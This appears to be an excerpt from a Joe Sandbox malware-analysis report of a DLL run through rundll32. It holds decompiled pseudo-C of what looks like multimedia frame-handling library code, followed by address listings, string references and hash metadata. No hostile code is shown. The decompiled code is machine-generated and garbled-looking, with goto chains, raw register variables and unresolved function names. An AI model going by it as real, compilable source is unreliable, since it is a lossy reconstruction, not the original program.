                                                      																if( *(_t327 + 0x3c) == 0) {
                                                      																	_t220 = 0xffffffd8;
                                                      																	goto L103;
                                                      																} else {
                                                      																	__eflags =  *(_t364 + 0x1c);
                                                      																	if( *(_t364 + 0x1c) == 0) {
                                                      																		_t220 = 0xffffffea;
                                                      																		goto L103;
                                                      																	} else {
                                                      																		 *_t392 = _t219;
                                                      																		_t221 = L10009FC0(_t291, _t307);
                                                      																		 *(_t291 + 0x128) = _t221;
                                                      																		__eflags = _t221;
                                                      																		if(_t221 == 0) {
                                                      																			goto L102;
                                                      																		} else {
                                                      																			_t392[1] = _t291;
                                                      																			 *_t392 = _t364;
                                                      																			_t224 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t364 + 4)))) + 0x3c))();
                                                      																			__eflags = _t224;
                                                      																			if(_t224 < 0) {
                                                      																				_t392[7] = _t224;
                                                      																				 *_t392 = _t291 + 0x128;
                                                      																				E1000A000(_t291 + 0x128, _t364);
                                                      																				_t220 = _t392[7];
                                                      																				goto L103;
                                                      																			} else {
                                                      																				 *(_t291 + 0x40) = _t291;
                                                      																				__eflags = 0;
                                                      																				return 0;
                                                      																			}
                                                      																		}
                                                      																	}
                                                      																}
                                                      															} else {
                                                      																 *((intOrPtr*)(_t291 + 0x50)) =  *((intOrPtr*)(_t364 + 0x24));
                                                      																 *_t392 = _t219;
                                                      																_t227 = L10009FC0(_t291, _t306);
                                                      																 *(_t291 + 0x128) = _t227;
                                                      																__eflags = _t227;
                                                      																if(_t227 == 0) {
                                                      																	L102:
                                                      																	_t220 = 0xfffffff4;
                                                      																	goto L103;
                                                      																} else {
                                                      																	_t228 = L1001AC40(_t291, _t343, _t364);
                                                      																	_t392[0xb] = _t228;
                                                      																	__eflags = _t228;
                                                      																	if(_t228 == 0) {
                                                      																		goto L102;
                                                      																	} else {
                                                      																		_t392[1] = _t228;
                                                      																		_t392[2] = 0;
                                                      																		_t230 =  *( *((intOrPtr*)(_t364 + 4)) + 0xc);
                                                      																		 *_t392 = _t230;
                                                      																		L96();
                                                      																		__eflags = _t230;
                                                      																		if(_t230 < 0) {
                                                      																			L109:
                                                      																			_t392[7] = _t230;
                                                      																			 *_t392 =  &(_t392[0xb]);
                                                      																			L1001ADB0(_t291);
                                                      																			return _t392[7];
                                                      																		} else {
                                                      																			 *_t392 = _t291;
                                                      																			_t392[2] =  *( *((intOrPtr*)(_t364 + 4)) + 0x10);
                                                      																			_t392[1] = _t392[0xb];
                                                      																			_t230 = E1001E0B0(_t291, _t343, _t364);
                                                      																			__eflags = _t230;
                                                      																			if(_t230 == 0) {
                                                      																				goto L109;
                                                      																			} else {
                                                      																				_t392[3] = _t230;
                                                      																				_t392[7] = _t230;
                                                      																				_t392[1] = 0x10;
                                                      																				_t392[2] = "Failed to map frame into derived frame context: %d.\n";
                                                      																				 *_t392 = _t364;
                                                      																				L10023A40();
                                                      																				 *_t392 =  &(_t392[0xb]);
                                                      																				L1001ADB0("Failed to map frame into derived frame context: %d.\n");
                                                      																				_t220 = _t392[7];
                                                      																				L103:
                                                      																				return _t220;
                                                      																			}
                                                      																		}
                                                      																	}
                                                      																}
                                                      															}
                                                      														} else {
                                                      															goto L75;
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							} else {
                                                      								__eflags = __ecx[4] - __eax;
                                                      								if(__ecx[4] == __eax) {
                                                      									L89:
                                                      									__eax = __edi[0xb8];
                                                      									__eflags = __eax;
                                                      									if(__eax == 0) {
                                                      										 *__esp = __edx;
                                                      										__ecx = "Invalid mapping found when attempting unmap.\n";
                                                      										__ebx = 0x10;
                                                      										__esp[2] = "Invalid mapping found when attempting unmap.\n";
                                                      										__esp[1] = 0x10;
                                                      										L10023A40() = 0xffffffea;
                                                      										L76:
                                                      										return _t214;
                                                      									} else {
                                                      										__esi =  *(__eax + 4);
                                                      										__eax = E1001B300(__ebx);
                                                      										__edi = __esp[0x11];
                                                      										__ebp = __esp[0x12];
                                                      										__eax =  *__esi;
                                                      										__esp[0x14] = __ebx;
                                                      										__esi = __esp[0x10];
                                                      										__ebx = __esp[0xf];
                                                      										__esp[0x15] = __eax;
                                                      										__esp =  &(__esp[0x13]);
                                                      										_push(_t383);
                                                      										_push(_t343);
                                                      										_push(_t362);
                                                      										_t396 = _t390 - 0x1c;
                                                      										_t297 = _t396[0xd];
                                                      										_t385 = _t396[0xc];
                                                      										_t345 = _t297 + 0x158;
                                                      										 *((intOrPtr*)(_t385 + 0x50)) =  *((intOrPtr*)(_t297 + 0x50));
                                                      										 *((intOrPtr*)(_t385 + 0x44)) =  *((intOrPtr*)(_t297 + 0x44));
                                                      										 *((intOrPtr*)(_t385 + 0x48)) =  *((intOrPtr*)(_t297 + 0x48));
                                                      										 *((intOrPtr*)(_t385 + 0x4c)) =  *((intOrPtr*)(_t297 + 0x4c));
                                                      										 *(_t385 + 0x120) =  *(_t297 + 0x120);
                                                      										 *(_t385 + 0xb4) =  *(_t297 + 0xb4);
                                                      										 *(_t385 + 0xb0) =  *(_t297 + 0xb0);
                                                      										 *_t396 = _t345;
                                                      										if(L1000EC10(_t289) == 0) {
                                                      											_t283 =  *(_t297 + 0xb4);
                                                      											_t341 =  *(_t297 + 0xb0);
                                                      											if((_t283 | _t341) != 0) {
                                                      												_t396[2] = _t283;
                                                      												_t396[1] = _t341;
                                                      												 *_t396 = _t385 + 0x158;
                                                      												E1000D1B0();
                                                      											} else {
                                                      												 *(_t385 + 0x15c) =  *(_t297 + 0x120);
                                                      												 *(_t385 + 0x158) = 0;
                                                      											}
                                                      										}
                                                      										_t308 = 0;
                                                      										_t247 = E1001A6C0(_t385, 0, _t297, 0);
                                                      										_t368 = _t247;
                                                      										if(_t247 < 0) {
                                                      											L20:
                                                      											E1001A460(_t385);
                                                      											return _t368;
                                                      										} else {
                                                      											 *_t396 = _t345;
                                                      											if(L1000EC10() != 0) {
                                                      												_t396[1] = _t345;
                                                      												 *_t396 = _t385 + 0x158;
                                                      												_t253 = E1000D340();
                                                      												__eflags = _t253;
                                                      												_t368 = _t253;
                                                      												if(_t253 < 0) {
                                                      													goto L20;
                                                      												} else {
                                                      													_t254 =  *(_t297 + 0xb8);
                                                      													__eflags = _t254;
                                                      													if(_t254 != 0) {
                                                      														goto L7;
                                                      													} else {
                                                      														goto L33;
                                                      													}
                                                      												}
                                                      											} else {
                                                      												_t254 =  *(_t297 + 0xb8);
                                                      												if(_t254 == 0) {
                                                      													L33:
                                                      													 *_t396 = _t385;
                                                      													_t396[1] = 0;
                                                      													_t281 = L1001ADF0();
                                                      													__eflags = _t281;
                                                      													_t368 = _t281;
                                                      													if(_t281 < 0) {
                                                      														goto L20;
                                                      													} else {
                                                      														_t396[1] = _t297;
                                                      														 *_t396 = _t385;
                                                      														_t282 = L1001B8D0();
                                                      														__eflags = _t282;
                                                      														_t368 = _t282;
                                                      														if(_t282 < 0) {
                                                      															goto L20;
                                                      														} else {
                                                      															goto L35;
                                                      														}
                                                      													}
                                                      												} else {
                                                      													L7:
                                                      													_t370 = 0;
                                                      													L9:
                                                      													while(1) {
                                                      														if(_t254 == 0) {
                                                      															L11:
                                                      															_t370 = _t370 + 1;
                                                      															if(_t370 != 8) {
                                                      																_t254 =  *(_t297 + 0xb8 + _t370 * 4);
                                                      																continue;
                                                      															} else {
                                                      																if( *((intOrPtr*)(_t297 + 0xd8)) == 0) {
                                                      																	L22:
                                                      																	_t255 =  *(_t297 + 0x128);
                                                      																	__eflags = _t255;
                                                      																	if(_t255 == 0) {
                                                      																		L24:
                                                      																		__eflags =  *(_t297 + 0x40) - _t297;
                                                      																		if( *(_t297 + 0x40) == _t297) {
                                                      																			 *(_t385 + 0x40) = _t385;
                                                      																			goto L38;
                                                      																		} else {
                                                      																			_t352 =  *(_t385 + 0x15c);
                                                      																			_t368 = 0xffffffea;
                                                      																			__eflags = _t352;
                                                      																			if(_t352 == 0) {
                                                      																				goto L20;
                                                      																			} else {
                                                      																				_t396[1] = _t352;
                                                      																				 *_t396 = 4;
                                                      																				_t267 = E100263A0();
                                                      																				 *(_t385 + 0x40) = _t267;
                                                      																				__eflags = _t267;
                                                      																				if(_t267 == 0) {
                                                      																					goto L19;
                                                      																				} else {
                                                      																					_t314 = _t352 * 4;
                                                      																					_t378 =  *(_t297 + 0x40);
                                                      																					_t353 = _t267;
                                                      																					__eflags = _t314 - 8;
                                                      																					if(_t314 >= 8) {
                                                      																						__eflags = _t267 & 0x00000001;
                                                      																						if((_t267 & 0x00000001) != 0) {
                                                      																							_t268 =  *_t378 & 0x000000ff;
                                                      																							_t353 = _t353 + 1;
                                                      																							_t378 = _t378 + 1;
                                                      																							_t314 = _t314 - 1;
                                                      																							 *(_t353 - 1) = _t268;
                                                      																						}
                                                      																						__eflags = _t353 & 0x00000002;
                                                      																						if((_t353 & 0x00000002) != 0) {
                                                      																							_t269 =  *_t378 & 0x0000ffff;
                                                      																							_t353 = _t353 + 2;
                                                      																							_t378 = _t378 + 2;
                                                      																							_t314 = _t314 - 2;
                                                      																							 *(_t353 - 2) = _t269;
                                                      																						}
                                                      																						__eflags = _t353 & 0x00000004;
                                                      																						if((_t353 & 0x00000004) == 0) {
                                                      																							goto L28;
                                                      																						} else {
                                                      																							_t356 = _t353 + 4;
                                                      																							 *(_t356 - 4) =  *_t378;
                                                      																							memcpy(_t356, _t378 + 4, _t314 - 4);
                                                      																							_t396 =  &(_t396[3]);
                                                      																							goto L38;
                                                      																						}
                                                      																						L50:
                                                      																						_t338 = _t337 + _t262;
                                                      																						_t375 = _t374 + _t262;
                                                      																						_t263 = 0;
                                                      																						__eflags = _t349 & 0x00000002;
                                                      																						if((_t349 & 0x00000002) != 0) {
                                                      																							 *_t338 =  *_t375 & 0x0000ffff;
                                                      																							_t263 = 2;
                                                      																						}
                                                      																						__eflags = _t349 & 0x00000001;
                                                      																						if((_t349 & 0x00000001) == 0) {
                                                      																							L35:
                                                      																							_t376 = 0;
                                                      																							__eflags = 0;
                                                      																						} else {
                                                      																							_t376 = 0;
                                                      																							 *((char*)(_t338 + _t263)) =  *(_t375 + _t263) & 0x000000ff;
                                                      																						}
                                                      																						return _t376;
                                                      																						goto L113;
                                                      																					} else {
                                                      																						L28:
                                                      																						memcpy(_t353, _t378, _t314);
                                                      																						_t396 =  &(_t396[3]);
                                                      																					}
                                                      																					L38:
                                                      																					__eflags = _t385 & 0x00000001;
                                                      																					_t335 = _t385;
                                                      																					_t309 = _t297;
                                                      																					_t347 = 0x20;
                                                      																					if((_t385 & 0x00000001) != 0) {
                                                      																						_t335 = _t385 + 1;
                                                      																						_t347 = 0x1f;
                                                      																						_t309 = _t297 + 1;
                                                      																						 *_t385 =  *_t297 & 0x000000ff;
                                                      																					}
                                                      																					__eflags = _t335 & 0x00000002;
                                                      																					if((_t335 & 0x00000002) != 0) {
                                                      																						_t257 =  *_t309 & 0x0000ffff;
                                                      																						_t335 = _t335 + 2;
                                                      																						_t309 =  &(_t309[1]);
                                                      																						_t347 = _t347 - 2;
                                                      																						 *(_t335 - 2) = _t257;
                                                      																					}
                                                      																					_t396[0xd] = _t297;
                                                      																					_t258 = 0;
                                                      																					_t373 = _t347 & 0xfffffffc;
                                                      																					__eflags = _t373;
                                                      																					do {
                                                      																						 *(_t335 + _t258) =  *(_t309 + _t258);
                                                      																						_t258 = _t258 + 4;
                                                      																						__eflags = _t258 - _t373;
                                                      																					} while (_t258 < _t373);
                                                      																					_t336 = _t335 + _t258;
                                                      																					_t310 = _t309 + _t258;
                                                      																					_t300 = _t396[0xd];
                                                      																					_t259 = 0;
                                                      																					__eflags = _t347 & 0x00000002;
                                                      																					if((_t347 & 0x00000002) != 0) {
                                                      																						 *_t336 =  *_t310 & 0x0000ffff;
                                                      																						_t259 = 2;
                                                      																					}
                                                      																					__eflags = _t347 & 0x00000001;
                                                      																					if((_t347 & 0x00000001) != 0) {
                                                      																						 *((char*)(_t336 + _t259)) =  *(_t310 + _t259) & 0x000000ff;
                                                      																					}
                                                      																					__eflags = _t385 & 0x00000001;
                                                      																					_t349 = 0x20;
                                                      																					_t337 = _t385 + 0x20;
                                                      																					_t374 = _t300 + 0x20;
                                                      																					if((_t385 & 0x00000001) != 0) {
                                                      																						_t337 = _t385 + 0x21;
                                                      																						_t349 = 0x1f;
                                                      																						_t374 = _t300 + 0x21;
                                                      																						 *(_t385 + 0x20) =  *(_t300 + 0x20) & 0x000000ff;
                                                      																					}
                                                      																					__eflags = _t337 & 0x00000002;
                                                      																					if((_t337 & 0x00000002) != 0) {
                                                      																						_t261 =  *_t374 & 0x0000ffff;
                                                      																						_t337 = _t337 + 2;
                                                      																						_t374 =  &(_t374[1]);
                                                      																						_t349 = _t349 - 2;
                                                      																						 *(_t337 - 2) = _t261;
                                                      																					}
                                                      																					_t262 = 0;
                                                      																					_t302 = _t349 & 0xfffffffc;
                                                      																					__eflags = _t302;
                                                      																					do {
                                                      																						 *(_t337 + _t262) =  *(_t374 + _t262);
                                                      																						_t262 = _t262 + 4;
                                                      																						__eflags = _t262 - _t302;
                                                      																					} while (_t262 < _t302);
                                                      																					goto L50;
                                                      																				}
                                                      																			}
                                                      																		}
                                                      																	} else {
                                                      																		 *_t396 = _t255;
                                                      																		_t273 = L10009FC0(_t297, _t308);
                                                      																		 *(_t385 + 0x128) = _t273;
                                                      																		__eflags = _t273;
                                                      																		if(_t273 == 0) {
                                                      																			goto L19;
                                                      																		} else {
                                                      																			goto L24;
                                                      																		}
                                                      																	}
                                                      																} else {
                                                      																	_t308 = 4;
                                                      																	_t396[1] = 4;
                                                      																	 *_t396 =  *(_t297 + 0xdc);
                                                      																	_t275 = E100266D0();
                                                      																	 *((intOrPtr*)(_t385 + 0xd8)) = _t275;
                                                      																	if(_t275 == 0) {
                                                      																		goto L19;
                                                      																	} else {
                                                      																		_t339 =  *(_t297 + 0xdc);
                                                      																		 *(_t385 + 0xdc) = _t339;
                                                      																		if(_t339 <= 0) {
                                                      																			goto L22;
                                                      																		} else {
                                                      																			_t396[0xc] = _t385;
                                                      																			_t388 = _t297;
                                                      																			_t304 = 0;
                                                      																			while(1) {
                                                      																				_t381 = _t304 * 4;
                                                      																				 *_t396 =  *( *((intOrPtr*)(_t388 + 0xd8)) + _t381);
                                                      																				 *((intOrPtr*)(_t275 + _t381)) = L10009FC0(_t304, _t308);
                                                      																				_t275 =  *((intOrPtr*)(_t396[0xc] + 0xd8));
                                                      																				if( *((intOrPtr*)(_t275 + _t381)) == 0) {
                                                      																					break;
                                                      																				}
                                                      																				_t304 = _t304 + 1;
                                                      																				__eflags =  *((intOrPtr*)(_t388 + 0xdc)) - _t304;
                                                      																				if( *((intOrPtr*)(_t388 + 0xdc)) <= _t304) {
                                                      																					_t297 = _t388;
                                                      																					_t385 = _t396[0xc];
                                                      																					goto L22;
                                                      																				} else {
                                                      																					continue;
                                                      																				}
                                                      																				goto L113;
                                                      																			}
                                                      																			_t385 = _t396[0xc];
                                                      																			goto L19;
                                                      																		}
                                                      																	}
                                                      																}
                                                      															}
                                                      														} else {
                                                      															 *_t396 = _t254;
                                                      															_t280 = L10009FC0(_t297, _t308);
                                                      															 *((intOrPtr*)(_t385 + 0xb8 + _t370 * 4)) = _t280;
                                                      															if(_t280 == 0) {
                                                      																L19:
                                                      																_t368 = 0xfffffff4;
                                                      																goto L20;
                                                      															} else {
                                                      																goto L11;
                                                      															}
                                                      														}
                                                      														goto L113;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								} else {
                                                      									goto L68;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				L113:
                                                      			}
                                                      0x1001e14c
                                                      0x1001e150
                                                      0x1001e153
                                                      0x1001e157
                                                      0x1001e159
                                                      0x1001e15b
                                                      0x00000000
                                                      0x1001e15d
                                                      0x1001e15d
                                                      0x1001e160
                                                      0x00000000
                                                      0x1001e166
                                                      0x1001e166
                                                      0x1001e166
                                                      0x1001e168
                                                      0x1001e176
                                                      0x1001e176
                                                      0x1001e17a
                                                      0x1001e17c
                                                      0x1001e182
                                                      0x1001e185
                                                      0x1001e18a
                                                      0x1001e18e
                                                      0x1001e194
                                                      0x00000000
                                                      0x1001e16a
                                                      0x1001e16a
                                                      0x1001e170
                                                      0x1001e2b6
                                                      0x1001e2be
                                                      0x1001e2c0
                                                      0x1001e2c4
                                                      0x1001e2c7
                                                      0x1001e2cf
                                                      0x1001e2d7
                                                      0x1001e2df
                                                      0x1001e2e4
                                                      0x1001e2f0
                                                      0x1001e2f1
                                                      0x1001e2f2
                                                      0x1001e2f5
                                                      0x1001e2f9
                                                      0x1001e2fd
                                                      0x1001e300
                                                      0x1001e303
                                                      0x1001e306
                                                      0x1001e308
                                                      0x1001e3c0
                                                      0x1001e3c2
                                                      0x1001e3c5
                                                      0x1001e3c7
                                                      0x1001e445
                                                      0x00000000
                                                      0x1001e3c9
                                                      0x1001e3cc
                                                      0x1001e3ce
                                                      0x1001e43b
                                                      0x00000000
                                                      0x1001e3d0
                                                      0x1001e3d0
                                                      0x1001e3d3
                                                      0x1001e3d8
                                                      0x1001e3de
                                                      0x1001e3e0
                                                      0x00000000
                                                      0x1001e3e2
                                                      0x1001e3e7
                                                      0x1001e3eb
                                                      0x1001e3ee
                                                      0x1001e3f1
                                                      0x1001e3f3
                                                      0x1001e420
                                                      0x1001e42a
                                                      0x1001e42d
                                                      0x1001e432
                                                      0x00000000
                                                      0x1001e3f5
                                                      0x1001e3f5
                                                      0x1001e3fb
                                                      0x1001e3ff
                                                      0x1001e3ff
                                                      0x1001e3f3
                                                      0x1001e3e0
                                                      0x1001e3ce
                                                      0x1001e30e
                                                      0x1001e311
                                                      0x1001e314
                                                      0x1001e317
                                                      0x1001e31c
                                                      0x1001e322
                                                      0x1001e324
                                                      0x1001e3b0
                                                      0x1001e3b0
                                                      0x00000000
                                                      0x1001e32a
                                                      0x1001e32a
                                                      0x1001e32f
                                                      0x1001e333
                                                      0x1001e335
                                                      0x00000000
                                                      0x1001e337
                                                      0x1001e337
                                                      0x1001e33d
                                                      0x1001e344
                                                      0x1001e347
                                                      0x1001e34a
                                                      0x1001e34f
                                                      0x1001e351
                                                      0x1001e400
                                                      0x1001e400
                                                      0x1001e408
                                                      0x1001e40b
                                                      0x1001e419
                                                      0x1001e357
                                                      0x1001e35d
                                                      0x1001e360
                                                      0x1001e368
                                                      0x1001e36c
                                                      0x1001e371
                                                      0x1001e373
                                                      0x00000000
                                                      0x1001e379
                                                      0x1001e379
                                                      0x1001e382
                                                      0x1001e38b
                                                      0x1001e38f
                                                      0x1001e393
                                                      0x1001e396
                                                      0x1001e39f
                                                      0x1001e3a2
                                                      0x1001e3a7
                                                      0x1001e3b5
                                                      0x1001e3ba
                                                      0x1001e3ba
                                                      0x1001e373
                                                      0x1001e351
                                                      0x1001e335
                                                      0x1001e324
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1001e170
                                                      0x1001e168
                                                      0x1001e160
                                                      0x1001e15b
                                                      0x1001e13e
                                                      0x1001e12e
                                                      0x1001e112
                                                      0x1001e112
                                                      0x1001e115
                                                      0x1001e230
                                                      0x1001e230
                                                      0x1001e236
                                                      0x1001e238
                                                      0x1001e292
                                                      0x1001e295
                                                      0x1001e29a
                                                      0x1001e29f
                                                      0x1001e2a3
                                                      0x1001e2ac
                                                      0x1001e197
                                                      0x1001e1aa
                                                      0x1001e23a
                                                      0x1001e23a
                                                      0x1001e240
                                                      0x1001e245
                                                      0x1001e249
                                                      0x1001e24d
                                                      0x1001e24f
                                                      0x1001e253
                                                      0x1001e257
                                                      0x1001e25b
                                                      0x1001e25f
                                                      0x1001bc40
                                                      0x1001bc41
                                                      0x1001bc42
                                                      0x1001bc44
                                                      0x1001bc47
                                                      0x1001bc4b
                                                      0x1001bc52
                                                      0x1001bc5e
                                                      0x1001bc64
                                                      0x1001bc6a
                                                      0x1001bc70
                                                      0x1001bc79
                                                      0x1001bc85
                                                      0x1001bc8b
                                                      0x1001bc91
                                                      0x1001bc9b
                                                      0x1001bc9d
                                                      0x1001bca3
                                                      0x1001bcad
                                                      0x1001be70
                                                      0x1001be7a
                                                      0x1001be7e
                                                      0x1001be81
                                                      0x1001bcb3
                                                      0x1001bcb9
                                                      0x1001bcc1
                                                      0x1001bcc1
                                                      0x1001bcad
                                                      0x1001bcc7
                                                      0x1001bccd
                                                      0x1001bcd4
                                                      0x1001bcd6
                                                      0x1001bdb8
                                                      0x1001bdba
                                                      0x1001bdc8
                                                      0x1001bcdc
                                                      0x1001bcdc
                                                      0x1001bce6
                                                      0x1001be40
                                                      0x1001be4a
                                                      0x1001be4d
                                                      0x1001be52
                                                      0x1001be54
                                                      0x1001be56
                                                      0x00000000
                                                      0x1001be5c
                                                      0x1001be5c
                                                      0x1001be62
                                                      0x1001be64
                                                      0x00000000
                                                      0x1001be6a
                                                      0x00000000
                                                      0x1001be6a
                                                      0x1001be64
                                                      0x1001bcec
                                                      0x1001bcec
                                                      0x1001bcf4
                                                      0x1001be90
                                                      0x1001be90
                                                      0x1001be95
                                                      0x1001be99
                                                      0x1001be9e
                                                      0x1001bea0
                                                      0x1001bea2
                                                      0x00000000
                                                      0x1001bea8
                                                      0x1001bea8
                                                      0x1001beac
                                                      0x1001beaf
                                                      0x1001beb4
                                                      0x1001beb6
                                                      0x1001beb8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1001beb8
                                                      0x1001bcfa
                                                      0x1001bcfa
                                                      0x1001bcfa
                                                      0x00000000
                                                      0x1001bd07
                                                      0x1001bd09
                                                      0x1001bd22
                                                      0x1001bd22
                                                      0x1001bd26
                                                      0x1001bd00
                                                      0x00000000
                                                      0x1001bd28
                                                      0x1001bd30
                                                      0x1001bdd6
                                                      0x1001bdd6
                                                      0x1001bddc
                                                      0x1001bdde
                                                      0x1001bdf2
                                                      0x1001bdf2
                                                      0x1001bdf5
                                                      0x1001bed0
                                                      0x00000000
                                                      0x1001bdfb
                                                      0x1001bdfb
                                                      0x1001be01
                                                      0x1001be06
                                                      0x1001be08
                                                      0x00000000
                                                      0x1001be0a
                                                      0x1001be0a
                                                      0x1001be0e
                                                      0x1001be15
                                                      0x1001be1a
                                                      0x1001be1d
                                                      0x1001be1f
                                                      0x00000000
                                                      0x1001be21
                                                      0x1001be21
                                                      0x1001be28
                                                      0x1001be2b
                                                      0x1001be2d
                                                      0x1001be30
                                                      0x1001bf96
                                                      0x1001bf98
                                                      0x1001c033
                                                      0x1001c036
                                                      0x1001c037
                                                      0x1001c038
                                                      0x1001c039
                                                      0x1001c039
                                                      0x1001bf9e
                                                      0x1001bfa4
                                                      0x1001c01e
                                                      0x1001c021
                                                      0x1001c024
                                                      0x1001c027
                                                      0x1001c02a
                                                      0x1001c02a
                                                      0x1001bfa6
                                                      0x1001bfac
                                                      0x00000000
                                                      0x1001bfb2
                                                      0x1001bfb4
                                                      0x1001bfbd
                                                      0x1001bfc0
                                                      0x1001bfc0
                                                      0x00000000
                                                      0x1001bfc0
                                                      0x1001bf66
                                                      0x1001bf66
                                                      0x1001bf68
                                                      0x1001bf6a
                                                      0x1001bf6c
                                                      0x1001bf72
                                                      0x1001bf77
                                                      0x1001bf7a
                                                      0x1001bf7a
                                                      0x1001bf7f
                                                      0x1001bf82
                                                      0x1001bebe
                                                      0x1001bebe
                                                      0x1001bebe
                                                      0x1001bf88
                                                      0x1001bf8c
                                                      0x1001bf8e
                                                      0x1001bf8e
                                                      0x1001bec9
                                                      0x00000000
                                                      0x1001be36
                                                      0x1001be36
                                                      0x1001be36
                                                      0x1001be36
                                                      0x1001be36
                                                      0x1001bed3
                                                      0x1001bed3
                                                      0x1001bed9
                                                      0x1001bedb
                                                      0x1001bedd
                                                      0x1001bee2
                                                      0x1001bfdf
                                                      0x1001bfe2
                                                      0x1001bfe7
                                                      0x1001bfea
                                                      0x1001bfea
                                                      0x1001bee8
                                                      0x1001beeb
                                                      0x1001bfc7
                                                      0x1001bfca
                                                      0x1001bfcd
                                                      0x1001bfd0
                                                      0x1001bfd3
                                                      0x1001bfd3
                                                      0x1001bef1
                                                      0x1001bef7
                                                      0x1001bef9
                                                      0x1001bef9
                                                      0x1001befc
                                                      0x1001beff
                                                      0x1001bf02
                                                      0x1001bf05
                                                      0x1001bf05
                                                      0x1001bf09
                                                      0x1001bf0b
                                                      0x1001bf0d
                                                      0x1001bf11
                                                      0x1001bf13
                                                      0x1001bf19
                                                      0x1001bf1e
                                                      0x1001bf21
                                                      0x1001bf21
                                                      0x1001bf26
                                                      0x1001bf29
                                                      0x1001bf2f
                                                      0x1001bf2f
                                                      0x1001bf32
                                                      0x1001bf38
                                                      0x1001bf3d
                                                      0x1001bf40
                                                      0x1001bf43
                                                      0x1001c00b
                                                      0x1001c00e
                                                      0x1001c013
                                                      0x1001c016
                                                      0x1001c016
                                                      0x1001bf49
                                                      0x1001bf4c
                                                      0x1001bff2
                                                      0x1001bff5
                                                      0x1001bff8
                                                      0x1001bffb
                                                      0x1001bffe
                                                      0x1001bffe
                                                      0x1001bf54
                                                      0x1001bf56
                                                      0x1001bf56
                                                      0x1001bf59
                                                      0x1001bf5c
                                                      0x1001bf5f
                                                      0x1001bf62
                                                      0x1001bf62
                                                      0x00000000
                                                      0x1001bf59
                                                      0x1001be1f
                                                      0x1001be08
                                                      0x1001bde0
                                                      0x1001bde0
                                                      0x1001bde3
                                                      0x1001bde8
                                                      0x1001bdee
                                                      0x1001bdf0
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1001bdf0
                                                      0x1001bd36
                                                      0x1001bd36
                                                      0x1001bd3b
                                                      0x1001bd45
                                                      0x1001bd48
                                                      0x1001bd4d

                                                      APIs
                                                      Strings
                                                      • Invalid mapping found when attempting unmap., xrefs: 1001E295
                                                      • Failed to map frame into derived frame context: %d., xrefs: 1001E37D
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_frame_unref
                                                      • String ID: Failed to map frame into derived frame context: %d.$Invalid mapping found when attempting unmap.
                                                      • API String ID: 3522828444-968520014
                                                      • Opcode ID: c51a9e1b472074b834904429bd500262b32e19eb408ec7d04c88999b5f63e95e
                                                      • Instruction ID: a9b2bb0cb6fdc28be8a2433754fc5c1c364900424f67e1161cdcac98c29180a2
                                                      • Opcode Fuzzy Hash: c51a9e1b472074b834904429bd500262b32e19eb408ec7d04c88999b5f63e95e
                                                      • Instruction Fuzzy Hash: 9A91BEB8A097419FC744CF29C58090EBBE0FF88754F16896EE9998B351D730ED81CB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ExclusiveLock$Releasemv_mallocz$Acquire_beginthreadexabortmv_callocmv_cpu_countmv_freepmv_logmvpriv_slicethread_free
                                                      • String ID: j
                                                      • API String ID: 2987404029-2137352139
                                                      • Opcode ID: a1457cafe947b66c241fed8b9d7c715ac0131585819b2ddc446b0be713ed2993
                                                      • Instruction ID: 08bf606ddb186d207094264f2d447dbf8bdb9a5961cd0d480e83cb1c64d41ca3
                                                      • Opcode Fuzzy Hash: a1457cafe947b66c241fed8b9d7c715ac0131585819b2ddc446b0be713ed2993
                                                      • Instruction Fuzzy Hash: 5F81E3B5A087409FD740EF29D48061ABBE0FF89344F11892EF8999B341D775E945CF82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 43%
                                                      			E1009E7E0() {
                                                      				char _v16;
                                                      				void _v76;
                                                      				char _v79;
